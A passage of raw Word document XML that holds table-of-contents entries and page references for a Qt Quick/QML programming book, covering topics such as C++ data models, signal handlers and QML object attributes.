        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>307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595" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Data Provided In A Custom C++ Model</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605595 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>307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96" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QStringList-based Model</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605596 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>307</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97" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObjectList-based model</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605597 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>308</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98" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel subclass</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605598 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>309</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599" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL Models</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605599 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>311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00" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Read-only Data Model</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605600 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>311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01" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Editable Data Model</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605601 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>312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02" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Exposing C++ Data Models to QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605602 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>312</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603" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts In Qt Quick - Convenience Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605603 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>313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04" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic Object Instantiation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605604 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>313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05" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic Bindings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605605 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>313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06" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic Signal Connections</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605606 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>314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07" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Timer-Based Events</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605607 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>314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08" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Signal and Handler Event System</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605608 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>314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09" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Receiving Signals with Signal Handlers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605609 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>314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10" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Change Signal Handlers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605610 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>315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11" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using the Connections Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605611 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>316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12" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Attached Signal Handlers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605612 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>316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13" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Adding Signals to Custom QML Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605613 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>317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14" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connecting Signals to Methods and Signals</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605614 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>317</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615" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Object Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605615 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>318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16" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Attributes in Object Declarations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605616 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>319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17" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:iCs/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>id</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t> Attribute</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605617 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>319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18" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605618 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>320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19" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Property Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605619 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>320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20" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Valid Types in Custom Property Definitions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605620 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>320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21" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
